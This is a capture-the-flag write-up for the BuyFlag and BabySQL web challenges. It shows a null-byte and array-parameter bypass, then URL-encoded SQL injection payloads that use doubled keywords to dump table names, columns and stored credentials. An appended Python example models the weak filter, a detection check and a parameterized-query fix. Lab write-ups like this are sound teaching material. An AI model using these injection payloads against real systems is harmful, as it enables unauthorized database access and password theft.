2.8 [极客大挑战 2019]BuyFlag&BabySQL

BuyFlag

Viewing the page source reveals a block of PHP code:

Capture the request and set user=1.

Then bypass the is_numeric check by using a %00 (null byte) truncation.

The money field is also required; an array is used to bypass its check.

payload:

password=404%00&money[]=100000000


BabySQL

Analysis shows that keywords such as and, or, union and select are filtered, but the filter can be bypassed by writing each keyword doubled (the filter removes the keyword once, and the remaining fragments re-form it). There are displayable columns, so an ordinary SQL injection statement with doubled keywords completes the injection.



Payloads used:

Query table names:
admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23

Query column names:
admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23

Query column contents:
username=admin&password=admi' uniunionon selselectect 1,group_concat(concat_ws(':',username,passwoorrd)),3 frofromm b4bsql --+
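As an added illustration that is not part of the original writeup: a Python model of why a single-pass keyword blacklist lets doubled keywords through, a fixpoint variant and a detection check that catch them, and the parameterized query that removes the problem entirely. The exact blacklist and the single-pass implementation are assumptions about the challenge's filter, and the users table is constructed.

```python
import re
import sqlite3

# Keywords the challenge is assumed to strip (the writeup names and/or/union/select;
# from/where are inferred from the doubled "frfromom"/"whwhereere" in its payload).
BLACKLIST = ["union", "select", "from", "where", "and", "or"]
PATTERN = re.compile("|".join(BLACKLIST), re.IGNORECASE)

# The password value from the writeup's first payload, URL-decoded.
DOUBLED = ("admin1'uniunionon selselectect 1,2,group_concat(table_name) "
           "frfromom infoorrmation_schema.tables whwhereere table_schema=database()#")


def single_pass_filter(s: str) -> str:
    """Assumed model of the vulnerable filter: each keyword occurrence is deleted
    once and the result is not rescanned, so the fragments on either side of a
    deleted keyword join up and re-form it ("uniunionon" -> "union")."""
    return PATTERN.sub("", s)


def fixpoint_filter(s: str) -> str:
    """Delete keywords until the string stops changing; a doubled keyword cannot
    survive this. Still a blacklist, so it is a stop-gap, not the fix."""
    while True:
        t = PATTERN.sub("", s)
        if t == s:
            return s
        s = t


def is_double_write_attempt(s: str) -> bool:
    """Detection rule for log/WAF review: an input that still contains a
    blacklisted keyword after one filter pass was built to re-form it."""
    return PATTERN.search(single_pass_filter(s)) is not None


def build_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return conn


def login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """The real fix: bound parameters keep the submitted text a plain value."""
    row = conn.execute("SELECT 1 FROM users WHERE username=? AND password=?",
                       (username, password)).fetchone()
    return row is not None
```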
